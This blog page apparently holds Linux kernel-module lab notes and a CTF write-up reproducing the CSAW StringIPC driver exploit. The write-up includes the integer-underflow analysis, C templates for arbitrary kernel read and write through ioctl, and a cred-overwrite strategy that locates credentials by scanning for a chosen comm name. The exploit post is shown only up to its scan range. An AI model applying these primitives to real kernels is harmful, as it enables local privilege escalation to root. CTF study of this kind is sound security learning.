Pwn进你的心

Linux-Lab1-Kernel modules

Posted on 2022-10-10 In Knowledge 11k 10 mins.

Kernel modules

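Create a simple module
Describe the process of compiling a kernel module
Show how a module is used with the kernel
Simple kernel debugging methods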

An example of a kernel module

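Below is a very simple kernel module example (the source is in linux/tools/labs/skels/kernel_modules/1-2-test-mod/hello_mod.c):

When it is loaded into the kernel, it generates the message "Hello!"
When it is unloaded, it generates the message "Goodbye!"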

#include <linux/module.h>
#include <linux/init.h>
#include <linux/kernel.h>

MODULE_DESCRIPTION("Simple module");
MODULE_AUTHOR("Kernel Hacker");
MODULE_LICENSE("GPL");

static int my_hello_init(void)
{
	pr_debug("Hello!\n");
	return 0;
}

static void hello_exit(void)
{
	pr_debug("Goodbye!\n");
}

module_init(my_hello_init);
module_exit(hello_exit);

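The generated messages are not displayed on the console. They are saved in a memory area reserved for this purpose, from which the logging daemon (syslog) extracts them
To display kernel messages, use the dmesg command or inspect the logs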

Compiling kernel modules

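Compiling a kernel module differs from compiling a user program:

First, other headers are used (the kernel's headers, not the C library's)
In addition, the module must not be linked against libraries
Finally, the module must be compiled with the same options as the kernel it will be loaded into

For these reasons there is a standard method for compiling kernel modules, which requires two files: a Makefile and a Kbuild file

Makefile: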

KDIR = /lib/modules/`uname -r`/build

kbuild:
	make -C $(KDIR) M=`pwd`
clean:
	make -C $(KDIR) M=`pwd` clean

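/lib/modules holds the installed modules of each kernel version; its build entry is a symbolic link to the tree used for building against that kernel
The -C option:
- tells make to change into the given directory first: /lib/modules/`uname -r`/build
The M= option:
- is needed when building an external module against a given kernel: add M=dir to the command line
- kbuild then looks for the module source in dir, compiles it, and produces the .ko file
In short: make first changes into KDIR (to use that kernel's build system), then reads the Kbuild file in the directory named by M= to find the module sources, and finally compiles them against the tree in KDIR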

Kbuild:

ccflags-y = -Wno-unused-function -Wno-unused-label -Wno-unused-variable -DDEBUG

obj-m = hello_mod.o

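Kbuild holds the actual compiler flags (here including -DDEBUG, which enables the pr_debug output used by the module) and names the module objects to build

Running make is enough to build the module: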

➜  1-2-test-mod git:(master) ✗ make      
make -C /lib/modules/`uname -r`/build M=`pwd`
make[1]: Entering directory '/usr/src/linux-headers-5.15.0-48-generic'
  CC [M]  /home/yhellow/linux/tools/labs/skels/kernel_modules/1-2-test-mod/hello_mod.o
  MODPOST /home/yhellow/linux/tools/labs/skels/kernel_modules/1-2-test-mod/Module.symvers
  CC [M]  /home/yhellow/linux/tools/labs/skels/kernel_modules/1-2-test-mod/hello_mod.mod.o
  LD [M]  /home/yhellow/linux/tools/labs/skels/kernel_modules/1-2-test-mod/hello_mod.ko
  BTF [M] /home/yhellow/linux/tools/labs/skels/kernel_modules/1-2-test-mod/hello_mod.ko
Skipping BTF generation for /home/yhellow/linux/tools/labs/skels/kernel_modules/1-2-test-mod/hello_mod.ko due to unavailability of vmlinux
make[1]: Leaving directory '/usr/src/linux-headers-5.15.0-48-generic'

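This is the standard way of building a kernel module, and it uses the host's own /lib/modules/

To build a module for the kernel that runs in the virtual machine, KDIR has to be changed:

KDIR = /home/yhellow/linux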

If a module is built from several source files, use a Kbuild like the following (the example is in the linux/tools/labs/skels/kernel_modules/4-multi-mod directory):

ccflags-y = -Wno-unused-function -Wno-unused-label -Wno-unused-variable

obj-m        = supermodule.o
supermodule-y = mod1.o mod2.o

Loading/UnLoading a kernel module

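To load a kernel module, use the insmod command

To unload a module from the kernel, use the rmmod command

insmod module.ko
rmmod module.ko

When the kernel module is loaded, the routine passed to the module_init macro is executed
Likewise, when the module is unloaded, the routine passed to module_exit is executed

A complete example of loading and unloading a kernel module: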

➜  1-2-test-mod git:(master) ✗ sudo insmod hello_mod.ko
➜  1-2-test-mod git:(master) ✗ dmesg | tail -1
[ 1817.709484] Hello!
➜  1-2-test-mod git:(master) ✗ ls /sys/module | grep hello 
hello_mod

➜  1-2-test-mod git:(master) ✗ sudo rmmod hello_mod.ko 
➜  1-2-test-mod git:(master) ✗ dmesg | tail -2            
[ 1817.709484] Hello!
[ 1943.965668] Goodbye!
➜  1-2-test-mod git:(master) ✗ ls /sys/module | grep hello

Kernel Module Debugging

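Troubleshooting a kernel module is much more complicated than debugging a regular program:

A bug in a kernel module can hang the entire system
Troubleshooting is therefore much slower

To avoid rebooting, using a virtual machine (qemu, virtualbox, vmware) is recommended

When a module containing a bug is inserted into the kernel, it will eventually generate a kernel oops:

A kernel oops comes from an invalid operation detected by the kernel and can only be generated by the kernel
After a kernel oops, the kernel continues to run
The oops is reported as a kernel message; kernel messages are saved in the log and can be displayed with dmesg

To make sure no kernel message is lost, insert and test the module directly from the console, or check the kernel messages periodically (note that a kernel oops can be caused by a hardware error as well as by a programming error)

By contrast, a fatal kernel error produces a kernel panic:

After a kernel panic, the system cannot return to a stable state

Consider the following kernel module, which contains a bug that generates a kernel oops (the source is in linux/tools/labs/skels/kernel_modules/5-oops-mod/oops_mod.c):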

#include <linux/module.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/slab.h>

MODULE_DESCRIPTION("Oops generating module");
MODULE_AUTHOR("So2rul Esforever");
MODULE_LICENSE("GPL");

static int my_oops_init(void)
{
	char *p = 0;

	pr_info("before init\n");
	*p = 'a'; /* write through a NULL pointer */
	pr_info("after init\n");

	return 0;
}

static void my_oops_exit(void)
{
	pr_info("module goes all out\n");
}

module_init(my_oops_init);
module_exit(my_oops_exit);

The test result:

➜  5-oops-mod git:(master) ✗ sudo insmod oops_mod.ko
[1]    13015 killed     sudo insmod oops_mod.ko

The kernel detected the oops and killed the insmod process. Check the system log with dmesg:

➜  5-oops-mod git:(master) ✗ dmesg | tail -64
[  139.812510] before init
[  139.812512] BUG: kernel NULL pointer dereference, address: 0000000000000000
[  139.812515] #PF: supervisor write access in kernel mode
[  139.812516] #PF: error_code(0x0002) - not-present page
[  139.812517] PGD 0 P4D 0 
[  139.812519] Oops: 0002 [#1] SMP NOPTI
[  139.812521] CPU: 1 PID: 3543 Comm: insmod Tainted: G           OE     5.15.0-48-generic #54~20.04.1-Ubuntu
[  139.812523] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
[  139.812524] RIP: 0010:my_oops_init+0x15/0x31 [oops_mod]
[  139.812528] Code: Unable to access opcode bytes at RIP 0xffffffffc0b1bfeb.
[  139.812528] RSP: 0018:ffffb1bb85c6bb98 EFLAGS: 00010246
[  139.812530] RAX: 000000000000000b RBX: 0000000000000000 RCX: 0000000000000027
[  139.812530] RDX: 0000000000000000 RSI: ffffb1bb85c6b9e0 RDI: ffff942775e60588
[  139.812531] RBP: ffffb1bb85c6bb98 R08: ffff942775e60580 R09: 0000000000000001
[  139.812532] R10: 0000000000000001 R11: 000000000000000f R12: ffffffffc0b1c000
[  139.812533] R13: ffff942695cb5ac0 R14: ffffffffc0b1e000 R15: 0000000000000000
[  139.812534] FS:  00007f0f977db740(0000) GS:ffff942775e40000(0000) knlGS:0000000000000000
[  139.812535] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  139.812536] CR2: ffffffffc0b1bfeb CR3: 00000001a9510003 CR4: 0000000000770ee0
[  139.812557] PKRU: 55555554
[  139.812558] Call Trace:
[  139.812559]  <TASK>
[  139.812561]  do_one_initcall+0x46/0x1e0
[  139.812565]  ? __cond_resched+0x19/0x40
[  139.812568]  ? kmem_cache_alloc_trace+0x15a/0x420
[  139.812571]  do_init_module+0x52/0x230
[  139.812574]  load_module+0x1376/0x1600
[  139.812576]  __do_sys_finit_module+0xbf/0x120
[  139.812578]  ? __do_sys_finit_module+0xbf/0x120
[  139.812579]  __x64_sys_finit_module+0x1a/0x20
[  139.812581]  do_syscall_64+0x59/0xc0
[  139.812583]  ? fput+0x13/0x20
[  139.812584]  ? ksys_mmap_pgoff+0x14b/0x2a0
[  139.812586]  ? exit_to_user_mode_prepare+0x3d/0x1c0
[  139.812588]  ? exit_to_user_mode_prepare+0x3d/0x1c0
[  139.812589]  ? syscall_exit_to_user_mode+0x27/0x50
[  139.812591]  ? __x64_sys_mmap+0x33/0x50
[  139.812592]  ? do_syscall_64+0x69/0xc0
[  139.812593]  ? do_syscall_64+0x69/0xc0
[  139.812594]  entry_SYSCALL_64_after_hwframe+0x61/0xcb
[  139.812596] RIP: 0033:0x7f0f9792173d
[  139.812598] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 23 37 0d 00 f7 d8 64 89 01 48
[  139.812599] RSP: 002b:00007ffdee07d0f8 EFLAGS: 00000246 ORIG_RAX: 0000000000000139
[  139.812600] RAX: ffffffffffffffda RBX: 000055e6a61767c0 RCX: 00007f0f9792173d
[  139.812601] RDX: 0000000000000000 RSI: 000055e6a5c91358 RDI: 0000000000000003
[  139.812602] RBP: 0000000000000000 R08: 0000000000000000 R09: 00007f0f979f8580
[  139.812602] R10: 0000000000000003 R11: 0000000000000246 R12: 000055e6a5c91358
[  139.812603] R13: 0000000000000000 R14: 000055e6a6176760 R15: 0000000000000000
[  139.812604]  </TASK>
[  139.812605] Modules linked in: oops_mod(OE+) isofs xt_conntrack xt_MASQUERADE nf_conntrack_netlink nfnetlink xfrm_user xfrm_algo xt_addrtype iptable_filter iptable_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c bpfilter br_netfilter bridge stp llc rfcomm aufs overlay bnep vsock_loopback vmw_vsock_virtio_transport_common vmw_vsock_vmci_transport vsock binfmt_misc nls_iso8859_1 intel_rapl_msr intel_rapl_common kvm_intel kvm crct10dif_pclmul ghash_clmulni_intel aesni_intel crypto_simd vmw_balloon cryptd btusb input_leds btrtl btbcm btintel bluetooth joydev serio_raw ecdh_generic ecc vmw_vmci mac_hid sch_fq_codel vmwgfx ttm drm_kms_helper cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt msr parport_pc ppdev drm lp parport ip_tables x_tables autofs4 hid_generic crc32_pclmul usbhid ahci libahci psmouse hid e1000 mptspi pata_acpi mptscsih mptbase i2c_piix4 scsi_transport_spi
[  139.812636] CR2: 0000000000000000
[  139.812637] ---[ end trace 840a29bcd63bee0c ]---
[  139.812638] RIP: 0010:my_oops_init+0x15/0x31 [oops_mod]
[  139.812640] Code: Unable to access opcode bytes at RIP 0xffffffffc0b1bfeb.
[  139.812641] RSP: 0018:ffffb1bb85c6bb98 EFLAGS: 00010246
[  139.812642] RAX: 000000000000000b RBX: 0000000000000000 RCX: 0000000000000027
[  139.812642] RDX: 0000000000000000 RSI: ffffb1bb85c6b9e0 RDI: ffff942775e60588
[  139.812643] RBP: ffffb1bb85c6bb98 R08: ffff942775e60580 R09: 0000000000000001
[  139.812644] R10: 0000000000000001 R11: 000000000000000f R12: ffffffffc0b1c000
[  139.812644] R13: ffff942695cb5ac0 R14: ffffffffc0b1e000 R15: 0000000000000000
[  139.812645] FS:  00007f0f977db740(0000) GS:ffff942775e40000(0000) knlGS:0000000000000000
[  139.812646] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  139.812647] CR2: ffffffffc0b1bfeb CR3: 00000001a9510003 CR4: 0000000000770ee0
[  139.812664] PKRU: 55555554

The log identifies not only the cause of the kernel oops (a NULL pointer dereference) but also where it was triggered: my_oops_init+0x15
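The location on the RIP line has the form symbol+offset/size, so my_oops_init+0x15/0x31 means offset 0x15 inside a function that is 0x31 bytes long. As a small illustration, the following userspace sketch splits such a string into its parts; the helper name parse_oops_loc and the struct are hypothetical and not part of any kernel tool.

```c
#include <stdio.h>

/* Hypothetical container for the three parts of "symbol+0xOFF/0xSIZE". */
struct oops_loc {
    char symbol[64];
    unsigned long offset;   /* distance of the faulting instruction from the symbol */
    unsigned long size;     /* total size of the function */
};

/* Returns 0 on success, -1 if the text does not have the expected shape. */
static int parse_oops_loc(const char *text, struct oops_loc *out)
{
    /* %63[^+] reads the symbol name up to (not including) the '+' sign. */
    if (sscanf(text, "%63[^+]+%lx/%lx", out->symbol, &out->offset, &out->size) != 3)
        return -1;
    return 0;
}
```

With the offset in hand, disassembling the module (for example with objdump -d oops_mod.ko) and looking at my_oops_init+0x15 shows the faulting instruction.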

Exercises

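To solve the exercises, you need to perform the following steps:

Prepare the skeletons from the templates (that is, the linux/tools/labs/skels folder)
Build the modules
Copy the modules to the virtual machine
Start the VM and test the modules in the VM

Below I only post the few exercises I found interesting:

6. Module parameters:

Compile and copy the associated module
Load the kernel module to see the printk message
Then unload the module from the kernel

Loading the module normally gives the following result: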

root@qemux86:~/skels/kernel_modules/6-cmd-mod# insmod cmd_mod.ko                
cmd_mod: loading out-of-tree module taints kernel.                              
Early bird gets the worm

The goal is to change the output from Early bird gets the worm to Early bird gets tired

#include <linux/module.h>
#include <linux/init.h>
#include <linux/kernel.h>

MODULE_DESCRIPTION("Command-line args module");
MODULE_AUTHOR("Kernel Hacker");
MODULE_LICENSE("GPL");

static char *str = "the worm";

module_param(str, charp, 0000);
MODULE_PARM_DESC(str, "A simple string");

static int __init cmd_init(void)
{
	pr_info("Early bird gets %s\n", str);
	return 0;
}

static void __exit cmd_exit(void)
{
	pr_info("Exit, stage left\n");
}

module_init(cmd_init);
module_exit(cmd_exit);

module_param declares a parameter that can be passed to the module at load time
The parameter is given on the insmod command line:

root@qemux86:~/skels/kernel_modules/6-cmd-mod# insmod cmd_mod.ko str=tired
Early bird gets tired

7. Proc info:

Add code to display the process ID and executable name of the current process

#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
/* TODO: add missing headers */
#include <linux/sched.h>

MODULE_DESCRIPTION("List current processes");
MODULE_AUTHOR("Kernel Hacker");
MODULE_LICENSE("GPL");

static int my_proc_init(void)
{
	struct task_struct *p;
	struct list_head * pos;

	/* TODO: print current process pid and its name */
	p = current;
	pr_info("current pid: %d\n",p->pid);
	pr_info("current name: %s\n",p->comm);
	/* TODO: print the pid and name of all processes */
	list_for_each(pos, &p->tasks)
	{
		p = list_entry(pos, struct task_struct, tasks);
		pr_info("current pid: %d\n",p->pid);
		pr_info("current name: %s\n",p->comm);
	}
	return 0;
}

static void my_proc_exit(void)
{
	/* TODO: print current process pid and name */
	struct task_struct *p;
	p = current;
	pr_info("current pid: %d\n",p->pid);
	pr_info("current name: %s\n",p->comm);
}

module_init(my_proc_init);
module_exit(my_proc_exit);
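The loop above works because every task_struct embeds a list_head named tasks, and list_entry recovers the enclosing structure from a pointer to that member. The following is a userspace sketch of the same idea with simplified stand-ins for the kernel macros; struct fake_task and sum_other_pids are made up for the illustration. It also shows that a walk that starts at one node's own list_head visits every other node but not the starting one, which is why the module prints the current process separately.

```c
#include <stddef.h>

/* Simplified userspace stand-ins for the kernel's list helpers. */
struct list_head { struct list_head *next, *prev; };

#define list_entry(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))
#define list_for_each(pos, head) \
    for ((pos) = (head)->next; (pos) != (head); (pos) = (pos)->next)

/* Hypothetical miniature of task_struct: only the fields used above. */
struct fake_task {
    int pid;
    char comm[16];
    struct list_head tasks;
};

/* Insert node just before head, i.e. at the tail of the circular list. */
static void list_add_tail(struct list_head *node, struct list_head *head)
{
    node->prev = head->prev;
    node->next = head;
    head->prev->next = node;
    head->prev = node;
}

/* Sum the pids of every task reachable from start, excluding start itself. */
static int sum_other_pids(struct fake_task *start)
{
    struct list_head *pos;
    int sum = 0;

    list_for_each(pos, &start->tasks)
        sum += list_entry(pos, struct fake_task, tasks)->pid;
    return sum;
}
```

In the kernel itself, the for_each_process macro performs this walk starting from init_task.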

Linux-Lab0-Preparation

Posted on 2022-10-10 In Knowledge 2.8k 3 mins.

Experimental preparation

Download the lab files from GitHub: linux-kernel-labs/linux: Linux kernel source tree (github.com)

In the tools/labs directory, run:

make clean
LABS=kernel_modules make skels

The lab files then appear in the skels/kernel_modules directory:

➜  labs git:(master) ✗ ls skels/kernel_modules/
1-2-test-mod  4-multi-mod  6-cmd-mod    8-kdb
3-error-mod   5-oops-mod   7-list-proc  9-dyndbg

Booting the virtual machine

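Summary of the virtual machine infrastructure:

~/src/linux: the Linux kernel source, needed to compile modules
~/src/linux/tools/labs/qemu: scripts and auxiliary files used to generate and run the QEMU VM

To start the virtual machine, run make boot in the ~/src/linux/tools/labs directory: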

➜  labs git:(master) ✗ make boot 
make -C /home/yhellow/linux
make[1]: Entering directory '/home/yhellow/linux'
  SYSTBL  arch/x86/include/generated/asm/syscalls_32.h
  SYSHDR  arch/x86/include/generated/uapi/asm/unistd_32.h
  SYSHDR  arch/x86/include/generated/uapi/asm/unistd_64.h
  SYSHDR  arch/x86/include/generated/uapi/asm/unistd_x32.h
......

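By default you get no prompt or graphical interface, but you can connect to the console exposed by the virtual machine with minicom or screen:

In the ~/src/linux/tools/labs directory, run minicom -D serial.pts:

➜  labs git:(master) ✗ minicom -D serial.pts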

Welcome to minicom 2.7.1

OPTIONS: I18n 
Compiled on Dec 23 2019, 02:06:26.
Port serial.pts, 19:21:44

Press CTRL-A Z for help on special keys

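To access the virtual machine, enter the user name root at the login prompt; no password is required
The virtual machine starts with the privileges of the root account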

Poky (Yocto Project Reference Distro) 2.3 qemux86 /dev/hvc0

qemux86 login: root                                                 
root@qemux86:~# whoami                                                          
root                                                                            
root@qemux86:~#

Adding and using a virtual disk

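The labs directory contains a new virtual machine disk, the file ~/src/linux/tools/labs/mydisk.img. We want to add this disk to the virtual machine and use it there

If you do not have mydisk.img, download it from the following link: mydisk.img

Edit ~/src/linux/tools/labs/qemu/Makefile and add the mydisk.img line (the last one below) at the corresponding place:

-drive file=$(YOCTO_IMAGE),if=virtio,format=raw \
-drive file=disk1.img,if=virtio,format=raw \
-drive file=disk2.img,if=virtio,format=raw \
-drive file=mydisk.img,if=virtio,format=raw \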

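Start the virtual machine, create a directory, and try to mount the new disk

Two disks (disk1.img and disk2.img) had already been added to qemu

root@qemux86:~# /dev/vd
vda  vdb  vdc  vdd

vda is the root partition, vdb is disk1.img, vdc is disk2.img, and vdd is mydisk.img
There is no need to create the /dev entry for the new disk by hand, because the virtual machine uses devtmpfs (which sets up an initial /dev early in kernel boot, so early userspace does not have to wait for udev)
Mount it with the mount command:

mkdir /test
mount /dev/vdd /test

The mount fails (the files in mydisk.img do not appear in /test) because the kernel has no support for the filesystem the disk is formatted with
You need to identify the filesystem of mydisk.img and build support for it into the kernel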

➜  labs git:(master) ✗ file mydisk.img 
mydisk.img: BTRFS Filesystem sectorsize 4096, nodesize 4096, leafsize 4096, UUID=df3c665a-363d-46f8-aef0-f9959bad6832, 32768/104857600 bytes used, 1 devices

You need to enable btrfs support in the kernel and rebuild the kernel image (remember to save before leaving menuconfig)

make menuconfig
----------------------------------------
File systems -> Btrfs filesystem support

root@qemux86:~# mount /dev/vdd /test                                            
BTRFS: device fsid df3c665a-363d-46f8-aef0-f9959bad6832 devid 1 transid 9 /dev/)
BTRFS info (device vdd): disk space caching is enabled                          
root@qemux86:~# ls /test                                                        
README                                                                          
root@qemux86:~# cat /test/README                                                
Congratulations, you were able to follow instructions!

GDB spelunking

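Use gdb to display the source code of kernel_thread, the function that creates kernel threads

Use gdb to find the address and contents of the jiffies variable in memory
This variable holds the number of timer ticks since the system booted

To track the value of jiffies, use dynamic analysis in gdb:

First start the virtual machine
Then run the make gdb command

PS: my environment had some problems, so I debugged with gdb vmlinux plus target remote :1234 instead (this may also serve as a reference)

pwndbg> x/gx & jiffies
0xc194b500 <jiffies_64>: 0x00000000ffff96c2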

cred attack+vdso attack

Posted on 2022-10-08 In Reappearance 16k 14 mins.

Reproducing StringIPC

qemu-system-x86_64 \
    -m 512 \
    -kernel ./bzImage \
    -initrd ./rootfs.cpio \
    -append "console=ttyS0 root=/dev/ram rdinit=/sbin/init" \
    -nographic \
    -s \
    -cpu qemu64,+smep,+smap \
    -netdev user,id=t0, -device e1000,netdev=t0,id=nic0

smep and smap (I added these myself; the original challenge does not enable them)

#! /bin/sh
/bin/mount -a
mount -t proc none /proc
mount -t tmpfs -o size=64k,mode=0755 tmpfs /dev
mkdir /dev/pts
mount -t devpts devpts /dev/pts
mount -t sysfs sysfs /sys
sysctl -w kernel.hotplug=/sbin/mdev
ifconfig lo 127.0.0.1 netmask 255.255.255.0
route add -net 127.0.0.0 netmask 255.255.255.0 lo
insmod StringIPC.ko # driver module
/sbin/mdev -s
echo "man, you got me" > flag
chmod 400 flag
chmod 766 /dev/csaw
nohup /sudo_timer &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
poweroff -d 0  -f

Vulnerability analysis

The bug is the same as in qwb2018-solid_core:

buf_size = channel->buf_size;
ch1 = buf_size + id;
ch2 = buf_size - id;
if ( !key_s )
    ch1 = ch2;
data = (char *)krealloc(channel->data, ch1 + 1, 0x24000C0LL);

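CSAW_SHRINK_CHANNEL lets ch2 underflow to -1 when the requested shrink size is buf_size + 1
krealloc(channel->data, 0, 0x24000C0LL) then frees the buffer and returns ZERO_SIZE_PTR (0x10) rather than a real allocation, so channel->data becomes 0x10 while channel->buf_size becomes enormous (this is why the RAA/WAA templates below subtract 0x10 from the target address)

channel->data = data;
channel->buf_size = ch1;

This in turn bypasses the later bounds check:

if ( channel_from.size + index_write > channel_write->buf_size )
    goto LABEL_29;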
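The arithmetic behind the bug can be modelled in userspace. The sketch below is not the driver's code: model_shrink and write_allowed are hypothetical helpers that mirror the decompiled expressions above, assuming the sizes are unsigned 64-bit values (size_t).

```c
#include <stddef.h>

/* Result of the modelled shrink path. */
struct shrink_result {
    size_t new_buf_size;  /* value that ends up in channel->buf_size */
    size_t alloc_size;    /* value passed to krealloc (new_buf_size + 1) */
};

/* Mirrors "ch2 = buf_size - size; krealloc(data, ch2 + 1, ...)". */
static struct shrink_result model_shrink(size_t buf_size, size_t shrink)
{
    struct shrink_result r;

    r.new_buf_size = buf_size - shrink;  /* wraps around when shrink > buf_size */
    r.alloc_size = r.new_buf_size + 1;   /* wraps back to 0 when new_buf_size is all ones */
    return r;
}

/* Mirrors the check "if (count + index > buf_size) goto fail". */
static int write_allowed(size_t index, size_t count, size_t buf_size)
{
    return !(count + index > buf_size);
}
```

With buf_size = 0x100 and a shrink of 0x101, the model gives a zero-byte allocation request and a buf_size of 0xffffffffffffffff, so an index anywhere in the kernel address space passes the check.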

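Exploitation approach

In qwb2018-solid_core, the author disabled both the cred attack and the vdso attack, so let's try them here

First, the templates for WAA (write to an arbitrary address) and RAA (read from an arbitrary address):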

void RAA(int fd, int channel_id, void *read_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct read_channel_args read_channel;

    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    read_channel.id = channel_id;
    read_channel.buf = (char*)read_buff;
    read_channel.count = len;
    ioctl(fd, CSAW_READ_CHANNEL, &read_channel);

    return;
}

void WAA(int fd, int channel_id, void* write_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct write_channel_args write_channel;
    uint32_t i;
    for (i=0; i<len; i++){
        seek_channel.id = channel_id;
        seek_channel.index = addr-0x10+i;
        seek_channel.whence = SEEK_SET;
        ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

        write_channel.id = channel_id;
        write_channel.buf = (char*)write_buff+i;
        write_channel.count = 1;
        ioctl(fd, CSAW_WRITE_CHANNEL, &write_channel);
    }
    return;
}

PS: the driver copies data with strncpy_from_user, which stops at a \x00 byte, so WAA is best done one byte per call
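The effect of that truncation can be shown with a small userspace model. This is only a sketch: copy_until_nul imitates the stop-at-NUL behaviour described above and is not the kernel's strncpy_from_user, and write_bytewise mirrors the per-byte loop in WAA.

```c
#include <stddef.h>

/* Model of a copy that stops once it has copied a NUL byte. */
static size_t copy_until_nul(char *dst, const char *src, size_t count)
{
    size_t i;

    for (i = 0; i < count; i++) {
        dst[i] = src[i];
        if (src[i] == '\0')
            break;          /* everything after the NUL is never copied */
    }
    return i;               /* number of non-NUL bytes copied */
}

/* One call per byte, as in WAA: every byte is delivered, NUL bytes included. */
static void write_bytewise(char *dst, const char *src, size_t len)
{
    for (size_t i = 0; i < len; i++)
        copy_until_nul(dst + i, src + i, 1);
}
```

A payload such as a kernel pointer or a zeroed cred almost always contains zero bytes, so a single bulk write would be cut short while the byte-wise loop delivers the whole buffer.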

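Cred Attack:

The kernel structure task_struct maintains and manages all the information related to a process/thread:

One very important member is the cred pointer: the kernel decides what privileges a process has from the contents of the cred structure (if the members from uid through fsgid are all 0, the process is generally treated as root)
To locate the cred pointer inside task_struct, we use another member of task_struct, comm[TASK_COMM_LEN]: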

/* Objective and real subjective task credentials (COW): */
const struct cred __rcu		*real_cred;

/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu		*cred;

/*
 * executable name, excluding path.
 *
 * - normally initialized setup_new_exec()
 * - access it with [gs]et_task_comm()
 * - lock it with task_lock()
 */
char				comm[TASK_COMM_LEN];

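The comm array sits directly after cred. It holds the thread name, which can be set to a chosen (and therefore unique) value with prctl(PR_SET_NAME, name)
real_cred and cred normally hold the same value, which can be used to confirm that cred has been found
With an arbitrary-read primitive (RAA), the exploit can scan memory for comm to find cred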
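The check on a single dumped page can be sketched as follows. The function names are hypothetical, the search loop is a portable stand-in for memmem, and the layout (real_cred and cred in the 16 bytes directly before comm) is an assumption taken from the struct excerpt above; it may differ between kernel versions and configurations.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Portable byte search; returns a pointer to the first match or NULL. */
static const unsigned char *find_bytes(const unsigned char *hay, size_t hay_len,
                                       const void *needle, size_t needle_len)
{
    if (needle_len == 0 || needle_len > hay_len)
        return NULL;
    for (size_t i = 0; i + needle_len <= hay_len; i++)
        if (memcmp(hay + i, needle, needle_len) == 0)
            return hay + i;
    return NULL;
}

/*
 * Look for the marker name in one page. On a hit, read the two 8-byte words
 * in front of it as real_cred and cred. Returns cred when both agree, else 0.
 */
static uint64_t find_cred_in_page(const unsigned char *page, size_t page_len,
                                  const char *marker, size_t marker_len)
{
    const unsigned char *hit = find_bytes(page, page_len, marker, marker_len);
    uint64_t real_cred, cred;

    if (hit == NULL || (size_t)(hit - page) < 16)
        return 0;   /* no match, or the pointers would lie before this page */

    memcpy(&real_cred, hit - 16, sizeof(real_cred));
    memcpy(&cred, hit - 8, sizeof(cred));
    return (real_cred == cred) ? cred : 0;
}
```

The bounds check on the hit position matters when the name happens to start within the first 16 bytes of a page, where reading backwards would leave the buffer.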

Finally, the range to scan has to be determined:

0xffffffffffffffff  ---+-----------+----------------------------------------------
    8M                 |           | unused hole                                   
0xffffffffff7ff000  ---|-----------+------------| FIXADDR_TOP |-------------------
    1M                 |           |                                               
0xffffffffff600000  ---+-----------+------------| VSYSCALL_ADDR |-----------------
    548K               |           | vsyscalls                                    
0xffffffffff577000  ---+-----------+------------| FIXADDR_START |-----------------
    5M                 |           | hole                                         
0xffffffffff000000  ---+-----------+------------| MODULES_END |------------------- 
    1520M              |           | module mapping space (MODULES_LEN)           
0xffffffffa0000000  ---+-----------+------------| MODULES_VADDR |-----------------
    512M               |           | kernel text mapping, from phys 0         
0xffffffff80000000  ---+-----------+------------| __START_KERNEL_map |------------
    2G                 |           | hole                                 
0xffffffff00000000  ---+-----------+----------------------------------------------
    64G                |           | EFI region mapping space                     
0xffffffef00000000  ---+-----------+----------------------------------------------
    444G               |           | hole                                         
0xffffff8000000000  ---+-----------+----------------------------------------------
    16T                |           | %esp fixup stacks                             
0xffffff0000000000  ---+-----------+----------------------------------------------
    3T                 |           | hole                                         
0xfffffc0000000000  ---+-----------+----------------------------------------------
    16T                |           | kasan shadow memory (16TB)                   
0xffffec0000000000  ---+-----------+----------------------------------------------
    1T                 |           | hole                                         
0xffffeb0000000000  ---+-----------+----------------------------------------------
    1T                 |           | virtual memory map for all of struct pages   
0xffffea0000000000  ---+-----------+------------| VMEMMAP_START |-----------------
    1T                 |           | hole                                        
0xffffe90000000000  ---+-----------+------------| VMALLOC_END   |-----------------
    32T                |           | vmalloc/ioremap (1 << VMALLOC_SIZE_TB)       
0xffffc90000000000  ---+-----------+------------| VMALLOC_START |-----------------
    1T                 |           | hole                                         
0xffffc80000000000  ---+-----------+---------------------------------------------- 
    64T                |           | direct mapping of all phys. memory           
                       |           | (1 << MAX_PHYSMEM_BITS)                       
0xffff880000000000 ----+-----------+-----------| __PAGE_OFFSET_BASE | ------------
    8T                 |           | guard hole, reserved for hypervisor           
0xffff800000000000 ----+-----------+----------------------------------------------
                       |-----------| hole caused by [48:63] sign extension

0x0000800000000000 ----+-----------+----------------------------------------------
    PAGE_SIZE          |           | guard page                                   
0x00007ffffffff000 ----+-----------+--------------| TASK_SIZE_MAX | -------------- 
    128T               |           | different per mm                            
0x0000000000000000 ----+-----------+----------------------------------------------

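Direct mapping region: 0xffff880000000000 ~ 0xffffc80000000000 (used by kmalloc; allocations are contiguous both physically and virtually)
Dynamic mapping region: 0xffffc90000000000 ~ 0xffffe90000000000 (used by vmalloc; allocations are virtually contiguous but not physically contiguous)
PS: cred lives in the direct mapping region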
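To get a feel for the size of that range, the worst case of a page-by-page scan can be computed directly. The macro and function names below are made up for the illustration; the addresses are the direct mapping bounds listed above.

```c
#include <stdint.h>

#define DIRECT_MAP_START 0xffff880000000000ULL
#define DIRECT_MAP_END   0xffffc80000000000ULL
#define SCAN_STEP        0x1000ULL   /* one 4 KiB page per read */

/* Number of page-sized reads needed to cover the whole direct mapping window. */
static uint64_t worst_case_reads(void)
{
    return (DIRECT_MAP_END - DIRECT_MAP_START) / SCAN_STEP;
}
```

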